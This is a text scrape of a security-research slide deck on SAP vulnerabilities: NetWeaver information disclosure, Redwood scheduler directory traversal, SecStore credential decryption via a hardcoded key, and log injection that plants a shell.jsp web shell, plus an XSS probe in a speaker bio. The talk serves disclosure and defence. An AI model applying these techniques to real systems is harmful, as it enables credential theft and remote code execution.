T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan....
Transcript of T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan....
![Page 1: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>](https://reader034.fdocuments.us/reader034/viewer/2022042113/5e8f0b5efb4cfb0c5f008456/html5/thumbnails/1.jpg)
T H E P H A N T O M S E C U R I T Y
By Vahagn Vardanyan and Vladimir Egorov
![Page 2: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>](https://reader034.fdocuments.us/reader034/viewer/2022042113/5e8f0b5efb4cfb0c5f008456/html5/thumbnails/2.jpg)
Master jedy Senior security researcher at ERPScan.
Bug hunter, malware and vulnerability researcher for over 5+ years
System of a Down FAN!!!
Vahagn Vardanyan
![Page 3: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>](https://reader034.fdocuments.us/reader034/viewer/2022042113/5e8f0b5efb4cfb0c5f008456/html5/thumbnails/3.jpg)
Young padawan security researcher at ERPScan.
Business application security, reverse engineering, and encryption
»><svg\onload=alert(”HELLO”)>
Vladimir Egorov
LET THE HATE FLOW THROUGH YOU
![Page 4: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>](https://reader034.fdocuments.us/reader034/viewer/2022042113/5e8f0b5efb4cfb0c5f008456/html5/thumbnails/4.jpg)
![Page 5: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>](https://reader034.fdocuments.us/reader034/viewer/2022042113/5e8f0b5efb4cfb0c5f008456/html5/thumbnails/5.jpg)
Introduction
SAP NetWeaver
Redwood
Revenge of the Logs
A New Hope
![Page 6: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>](https://reader034.fdocuments.us/reader034/viewer/2022042113/5e8f0b5efb4cfb0c5f008456/html5/thumbnails/6.jpg)
Introduction
• What is SAP?
• Vulnerability statistics
• The newest CVE
• Structure reminding
![Page 7: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>](https://reader034.fdocuments.us/reader034/viewer/2022042113/5e8f0b5efb4cfb0c5f008456/html5/thumbnails/7.jpg)
SAP NetWeaver
• What is NetWeaver?
• How to deploy apps?
![Page 8: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>](https://reader034.fdocuments.us/reader034/viewer/2022042113/5e8f0b5efb4cfb0c5f008456/html5/thumbnails/8.jpg)
Redwood
• Where I can find it?
• How to get access?
• A vulnerability
• DEMO
![Page 9: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>](https://reader034.fdocuments.us/reader034/viewer/2022042113/5e8f0b5efb4cfb0c5f008456/html5/thumbnails/9.jpg)
Revenge of
the Logs
• What is SAP CRM?
• How does it look?
• RCE via log injection
• DEMO
![Page 10: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>](https://reader034.fdocuments.us/reader034/viewer/2022042113/5e8f0b5efb4cfb0c5f008456/html5/thumbnails/10.jpg)
A New Hope
• Vulnerable systems
in the WILD
• PATCH info
![Page 11: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>](https://reader034.fdocuments.us/reader034/viewer/2022042113/5e8f0b5efb4cfb0c5f008456/html5/thumbnails/11.jpg)
Episode I
SAP NetWeaver
![Page 12: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>](https://reader034.fdocuments.us/reader034/viewer/2022042113/5e8f0b5efb4cfb0c5f008456/html5/thumbnails/12.jpg)
A short time ago in a galaxy very, very close ...
![Page 13: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>](https://reader034.fdocuments.us/reader034/viewer/2022042113/5e8f0b5efb4cfb0c5f008456/html5/thumbnails/13.jpg)
COMPANY
![Page 14: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>](https://reader034.fdocuments.us/reader034/viewer/2022042113/5e8f0b5efb4cfb0c5f008456/html5/thumbnails/14.jpg)
SAP notes By Year
![Page 15: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>](https://reader034.fdocuments.us/reader034/viewer/2022042113/5e8f0b5efb4cfb0c5f008456/html5/thumbnails/15.jpg)
CVE-2017-6950Location: SAP GUI
Type: RCE
CVE-2017-7717 Location: SAP NetWeaver
Type: SQL to RCE
CVE-2017-9844 Location: SAP NetWeaver
Type: Java deserialization
CVE-2017-11459 Location: SAP TREX
Type: RCE
![Page 16: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>](https://reader034.fdocuments.us/reader034/viewer/2022042113/5e8f0b5efb4cfb0c5f008456/html5/thumbnails/16.jpg)
How to get admin privileges in SAP?
![Page 17: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>](https://reader034.fdocuments.us/reader034/viewer/2022042113/5e8f0b5efb4cfb0c5f008456/html5/thumbnails/17.jpg)
![Page 18: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>](https://reader034.fdocuments.us/reader034/viewer/2022042113/5e8f0b5efb4cfb0c5f008456/html5/thumbnails/18.jpg)
![Page 19: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>](https://reader034.fdocuments.us/reader034/viewer/2022042113/5e8f0b5efb4cfb0c5f008456/html5/thumbnails/19.jpg)
![Page 20: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>](https://reader034.fdocuments.us/reader034/viewer/2022042113/5e8f0b5efb4cfb0c5f008456/html5/thumbnails/20.jpg)
Episode I
SAP NetWeaver
![Page 21: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>](https://reader034.fdocuments.us/reader034/viewer/2022042113/5e8f0b5efb4cfb0c5f008456/html5/thumbnails/21.jpg)
![Page 22: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>](https://reader034.fdocuments.us/reader034/viewer/2022042113/5e8f0b5efb4cfb0c5f008456/html5/thumbnails/22.jpg)
http://host:port/ webdynpro / resources / sap.com / tc~rtc~coll.appl.rtc~wd_chat / Chat#
CVE-2016-3973Location: SAP NetWeaver AS Java WD_CHAT
Type: Information Disclosure vulnerability
![Page 23: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>](https://reader034.fdocuments.us/reader034/viewer/2022042113/5e8f0b5efb4cfb0c5f008456/html5/thumbnails/23.jpg)
http://host:port/ webdynpro / resources / sap.com / tc~rtc~coll.appl.rtc~wd_chat / Chat#
CVE-2016-3973Location: SAP NetWeaver AS Java WD_CHAT
Type: Information Disclosure vulnerability
webdynpro / resources / sap.com / tc~rtc~coll.appl.rtc~wd_chat
![Page 24: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>](https://reader034.fdocuments.us/reader034/viewer/2022042113/5e8f0b5efb4cfb0c5f008456/html5/thumbnails/24.jpg)
http://host:port/ webdynpro / resources / sap.com / tc~rtc~coll.appl.rtc~wd_chat / Chat#
![Page 25: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>](https://reader034.fdocuments.us/reader034/viewer/2022042113/5e8f0b5efb4cfb0c5f008456/html5/thumbnails/25.jpg)
![Page 26: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>](https://reader034.fdocuments.us/reader034/viewer/2022042113/5e8f0b5efb4cfb0c5f008456/html5/thumbnails/26.jpg)
![Page 27: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>](https://reader034.fdocuments.us/reader034/viewer/2022042113/5e8f0b5efb4cfb0c5f008456/html5/thumbnails/27.jpg)
![Page 28: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>](https://reader034.fdocuments.us/reader034/viewer/2022042113/5e8f0b5efb4cfb0c5f008456/html5/thumbnails/28.jpg)
![Page 29: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>](https://reader034.fdocuments.us/reader034/viewer/2022042113/5e8f0b5efb4cfb0c5f008456/html5/thumbnails/29.jpg)
![Page 30: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>](https://reader034.fdocuments.us/reader034/viewer/2022042113/5e8f0b5efb4cfb0c5f008456/html5/thumbnails/30.jpg)
![Page 31: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>](https://reader034.fdocuments.us/reader034/viewer/2022042113/5e8f0b5efb4cfb0c5f008456/html5/thumbnails/31.jpg)
![Page 32: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>](https://reader034.fdocuments.us/reader034/viewer/2022042113/5e8f0b5efb4cfb0c5f008456/html5/thumbnails/32.jpg)
![Page 33: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>](https://reader034.fdocuments.us/reader034/viewer/2022042113/5e8f0b5efb4cfb0c5f008456/html5/thumbnails/33.jpg)
![Page 34: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>](https://reader034.fdocuments.us/reader034/viewer/2022042113/5e8f0b5efb4cfb0c5f008456/html5/thumbnails/34.jpg)
![Page 35: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>](https://reader034.fdocuments.us/reader034/viewer/2022042113/5e8f0b5efb4cfb0c5f008456/html5/thumbnails/35.jpg)
The bug here feel Iyoung padawan
![Page 36: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>](https://reader034.fdocuments.us/reader034/viewer/2022042113/5e8f0b5efb4cfb0c5f008456/html5/thumbnails/36.jpg)
![Page 37: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>](https://reader034.fdocuments.us/reader034/viewer/2022042113/5e8f0b5efb4cfb0c5f008456/html5/thumbnails/37.jpg)
https://host:port/scheduler/ui/js/ffffffffbac53543/UIUtilJavaScriptJS?javascript/old/utils.js
C:/usr/sap/<SID>J00/j2ee/cluster/apps/redwood.com/scheduler-ear/servlet_jsp/scheduler/root/black/javascript/old/utils.js
Path on filesystem:
Url:
![Page 38: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>](https://reader034.fdocuments.us/reader034/viewer/2022042113/5e8f0b5efb4cfb0c5f008456/html5/thumbnails/38.jpg)
https://host:port/scheduler/ui?
![Page 39: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>](https://reader034.fdocuments.us/reader034/viewer/2022042113/5e8f0b5efb4cfb0c5f008456/html5/thumbnails/39.jpg)
https://host:port/scheduler/ui?
![Page 40: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>](https://reader034.fdocuments.us/reader034/viewer/2022042113/5e8f0b5efb4cfb0c5f008456/html5/thumbnails/40.jpg)
https://host:port/scheduler/ui?
![Page 41: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>](https://reader034.fdocuments.us/reader034/viewer/2022042113/5e8f0b5efb4cfb0c5f008456/html5/thumbnails/41.jpg)
https://host:port/scheduler/ui?
![Page 42: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>](https://reader034.fdocuments.us/reader034/viewer/2022042113/5e8f0b5efb4cfb0c5f008456/html5/thumbnails/42.jpg)
https://host:port/scheduler/ui?
![Page 43: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>](https://reader034.fdocuments.us/reader034/viewer/2022042113/5e8f0b5efb4cfb0c5f008456/html5/thumbnails/43.jpg)
https://host:port/scheduler/ui?
Windows win.ini
![Page 44: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>](https://reader034.fdocuments.us/reader034/viewer/2022042113/5e8f0b5efb4cfb0c5f008456/html5/thumbnails/44.jpg)
![Page 45: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>](https://reader034.fdocuments.us/reader034/viewer/2022042113/5e8f0b5efb4cfb0c5f008456/html5/thumbnails/45.jpg)
JUST REPORT IT
![Page 46: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>](https://reader034.fdocuments.us/reader034/viewer/2022042113/5e8f0b5efb4cfb0c5f008456/html5/thumbnails/46.jpg)
![Page 47: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>](https://reader034.fdocuments.us/reader034/viewer/2022042113/5e8f0b5efb4cfb0c5f008456/html5/thumbnails/47.jpg)
DEMO TIME
![Page 48: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>](https://reader034.fdocuments.us/reader034/viewer/2022042113/5e8f0b5efb4cfb0c5f008456/html5/thumbnails/48.jpg)
SecStore in SAP is like the Death Star's thermal exhaust port:
A little weakness in the center of a fortified system
![Page 49: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>](https://reader034.fdocuments.us/reader034/viewer/2022042113/5e8f0b5efb4cfb0c5f008456/html5/thumbnails/49.jpg)
SecStore.properties
![Page 50: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>](https://reader034.fdocuments.us/reader034/viewer/2022042113/5e8f0b5efb4cfb0c5f008456/html5/thumbnails/50.jpg)
SecStore.propertiesSecStore.key
![Page 51: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>](https://reader034.fdocuments.us/reader034/viewer/2022042113/5e8f0b5efb4cfb0c5f008456/html5/thumbnails/51.jpg)
SecStore.propertiesSecStore.key
Administrator credentials
Database credentials
![Page 52: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>](https://reader034.fdocuments.us/reader034/viewer/2022042113/5e8f0b5efb4cfb0c5f008456/html5/thumbnails/52.jpg)
SecStore Decryptor
![Page 53: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>](https://reader034.fdocuments.us/reader034/viewer/2022042113/5e8f0b5efb4cfb0c5f008456/html5/thumbnails/53.jpg)
SecStore.key
SecStore Decryptor
![Page 54: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>](https://reader034.fdocuments.us/reader034/viewer/2022042113/5e8f0b5efb4cfb0c5f008456/html5/thumbnails/54.jpg)
SecStore.key
Hardcoded key
SecStore Decryptor
![Page 55: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>](https://reader034.fdocuments.us/reader034/viewer/2022042113/5e8f0b5efb4cfb0c5f008456/html5/thumbnails/55.jpg)
SecStore.key
Hardcoded key The real key
SecStore Decryptor
![Page 56: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>](https://reader034.fdocuments.us/reader034/viewer/2022042113/5e8f0b5efb4cfb0c5f008456/html5/thumbnails/56.jpg)
SecStore.key
Hardcoded key The real key
SecStore.properties
SecStore Decryptor
![Page 57: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>](https://reader034.fdocuments.us/reader034/viewer/2022042113/5e8f0b5efb4cfb0c5f008456/html5/thumbnails/57.jpg)
SecStore.key
Hardcoded key The real key
SecStore.properties
AdminPassword
3DES(CBC)
SecStore Decryptor
![Page 58: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>](https://reader034.fdocuments.us/reader034/viewer/2022042113/5e8f0b5efb4cfb0c5f008456/html5/thumbnails/58.jpg)
SecStore.key
Hardcoded key The real key
SecStore.properties
AdminPassword
3DES(CBC)
SecStore Decryptor
PBEWithSHAAnd3KeyTripleDESCBC
![Page 59: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>](https://reader034.fdocuments.us/reader034/viewer/2022042113/5e8f0b5efb4cfb0c5f008456/html5/thumbnails/59.jpg)
DEMO TIME
![Page 60: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>](https://reader034.fdocuments.us/reader034/viewer/2022042113/5e8f0b5efb4cfb0c5f008456/html5/thumbnails/60.jpg)
https://github.com/erpscanteam
![Page 61: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>](https://reader034.fdocuments.us/reader034/viewer/2022042113/5e8f0b5efb4cfb0c5f008456/html5/thumbnails/61.jpg)
![Page 62: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>](https://reader034.fdocuments.us/reader034/viewer/2022042113/5e8f0b5efb4cfb0c5f008456/html5/thumbnails/62.jpg)
![Page 63: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>](https://reader034.fdocuments.us/reader034/viewer/2022042113/5e8f0b5efb4cfb0c5f008456/html5/thumbnails/63.jpg)
![Page 64: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>](https://reader034.fdocuments.us/reader034/viewer/2022042113/5e8f0b5efb4cfb0c5f008456/html5/thumbnails/64.jpg)
![Page 65: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>](https://reader034.fdocuments.us/reader034/viewer/2022042113/5e8f0b5efb4cfb0c5f008456/html5/thumbnails/65.jpg)
![Page 66: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>](https://reader034.fdocuments.us/reader034/viewer/2022042113/5e8f0b5efb4cfb0c5f008456/html5/thumbnails/66.jpg)
What do we have now?
![Page 67: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>](https://reader034.fdocuments.us/reader034/viewer/2022042113/5e8f0b5efb4cfb0c5f008456/html5/thumbnails/67.jpg)
I. Anon directory traversal in scheduler by Redwood
Findings
![Page 68: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>](https://reader034.fdocuments.us/reader034/viewer/2022042113/5e8f0b5efb4cfb0c5f008456/html5/thumbnails/68.jpg)
I. Anon directory traversal in scheduler by Redwood
II. Decryption tool to get administrator password
Findings
![Page 69: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>](https://reader034.fdocuments.us/reader034/viewer/2022042113/5e8f0b5efb4cfb0c5f008456/html5/thumbnails/69.jpg)
I. Anon directory traversal in scheduler by Redwood
II. Decryption tool to get administrator password
III. ???
Findings
![Page 70: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>](https://reader034.fdocuments.us/reader034/viewer/2022042113/5e8f0b5efb4cfb0c5f008456/html5/thumbnails/70.jpg)
![Page 71: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>](https://reader034.fdocuments.us/reader034/viewer/2022042113/5e8f0b5efb4cfb0c5f008456/html5/thumbnails/71.jpg)
Customer Relationship Management
"Was ist das ???"
![Page 72: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>](https://reader034.fdocuments.us/reader034/viewer/2022042113/5e8f0b5efb4cfb0c5f008456/html5/thumbnails/72.jpg)
• Emails, telephones, chats, marketing materials, socialmedia..
• Analysing target audiences• Kind of collaboration
Customer Relationship Management
![Page 73: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>](https://reader034.fdocuments.us/reader034/viewer/2022042113/5e8f0b5efb4cfb0c5f008456/html5/thumbnails/73.jpg)
![Page 74: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>](https://reader034.fdocuments.us/reader034/viewer/2022042113/5e8f0b5efb4cfb0c5f008456/html5/thumbnails/74.jpg)
Log configuration...
![Page 75: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>](https://reader034.fdocuments.us/reader034/viewer/2022042113/5e8f0b5efb4cfb0c5f008456/html5/thumbnails/75.jpg)
![Page 76: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>](https://reader034.fdocuments.us/reader034/viewer/2022042113/5e8f0b5efb4cfb0c5f008456/html5/thumbnails/76.jpg)
![Page 77: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>](https://reader034.fdocuments.us/reader034/viewer/2022042113/5e8f0b5efb4cfb0c5f008456/html5/thumbnails/77.jpg)
SAP SYSTEM
![Page 78: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>](https://reader034.fdocuments.us/reader034/viewer/2022042113/5e8f0b5efb4cfb0c5f008456/html5/thumbnails/78.jpg)
SAP AS JAVA
![Page 79: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>](https://reader034.fdocuments.us/reader034/viewer/2022042113/5e8f0b5efb4cfb0c5f008456/html5/thumbnails/79.jpg)
Applications
SAP AS JAVA
![Page 80: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>](https://reader034.fdocuments.us/reader034/viewer/2022042113/5e8f0b5efb4cfb0c5f008456/html5/thumbnails/80.jpg)
Applications
SAP AS JAVA
![Page 81: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>](https://reader034.fdocuments.us/reader034/viewer/2022042113/5e8f0b5efb4cfb0c5f008456/html5/thumbnails/81.jpg)
Applications
SAP AS JAVA
![Page 82: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>](https://reader034.fdocuments.us/reader034/viewer/2022042113/5e8f0b5efb4cfb0c5f008456/html5/thumbnails/82.jpg)
Database
Applications
SAP AS JAVA
![Page 83: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>](https://reader034.fdocuments.us/reader034/viewer/2022042113/5e8f0b5efb4cfb0c5f008456/html5/thumbnails/83.jpg)
Database
Logs
Applications
SAP AS JAVA
![Page 84: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>](https://reader034.fdocuments.us/reader034/viewer/2022042113/5e8f0b5efb4cfb0c5f008456/html5/thumbnails/84.jpg)
Database
Logs
Applications
Before...
SAP AS JAVA
![Page 85: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>](https://reader034.fdocuments.us/reader034/viewer/2022042113/5e8f0b5efb4cfb0c5f008456/html5/thumbnails/85.jpg)
Database
Logs
Applications
SAP AS JAVA
SAP AS JAVA
Before...
After...
![Page 86: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>](https://reader034.fdocuments.us/reader034/viewer/2022042113/5e8f0b5efb4cfb0c5f008456/html5/thumbnails/86.jpg)
Database
Logs
Applications
SAP AS JAVA
Applications
SAP AS JAVA
Before...
After...
![Page 87: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>](https://reader034.fdocuments.us/reader034/viewer/2022042113/5e8f0b5efb4cfb0c5f008456/html5/thumbnails/87.jpg)
Database
Logs
Applications
SAP AS JAVA
Database
Applications
SAP AS JAVA
Before...
After...
![Page 88: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>](https://reader034.fdocuments.us/reader034/viewer/2022042113/5e8f0b5efb4cfb0c5f008456/html5/thumbnails/88.jpg)
Database
Logs
Applications
SAP AS JAVA
Database
Applications
SAP AS JAVA
Before...
After...
![Page 89: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>](https://reader034.fdocuments.us/reader034/viewer/2022042113/5e8f0b5efb4cfb0c5f008456/html5/thumbnails/89.jpg)
Database
Logs
Applications
SAP AS JAVA
Database
Applications
SAP AS JAVA
Before...
After...
![Page 90: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>](https://reader034.fdocuments.us/reader034/viewer/2022042113/5e8f0b5efb4cfb0c5f008456/html5/thumbnails/90.jpg)
Database
Logs
Applications
SAP AS JAVA
Database
Applications
SAP AS JAVA
Logs
Before...
After...
![Page 91: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>](https://reader034.fdocuments.us/reader034/viewer/2022042113/5e8f0b5efb4cfb0c5f008456/html5/thumbnails/91.jpg)
Database
Logs
Applications
SAP AS JAVA
Database
Applications
SAP AS JAVA
Logs
Before...
After...
![Page 92: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>](https://reader034.fdocuments.us/reader034/viewer/2022042113/5e8f0b5efb4cfb0c5f008456/html5/thumbnails/92.jpg)
Database
Logs
Applications
SAP AS JAVA
Database
Applications
SAP AS JAVA
Logs
Before...
After...
![Page 93: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>](https://reader034.fdocuments.us/reader034/viewer/2022042113/5e8f0b5efb4cfb0c5f008456/html5/thumbnails/93.jpg)
DEMO TIME
![Page 94: T H E P H A N T O M S E C U R I T Y · 2019-09-10 · Young padawan security researcher at ERPScan. Business application security, reverse engineering, and encryption »>](https://reader034.fdocuments.us/reader034/viewer/2022042113/5e8f0b5efb4cfb0c5f008456/html5/thumbnails/94.jpg)
Before After
Log file extension: *.log, *.xml or *.trc Log file extension: *.jsp
Access via browser: DENIED Access via browser: GRANTED
Path on file system:C:\usr\sap\DM0\J00\j2ee\cluster\server0\log\
Path on file system:C:\usr\sap\DM0\J00\j2ee\cluster\apps\sap.com\com.sap.engine.docs.examples\servlet_jsp\_default\root\shell.jsp
URL: https://host:port/shell.jspURL: None
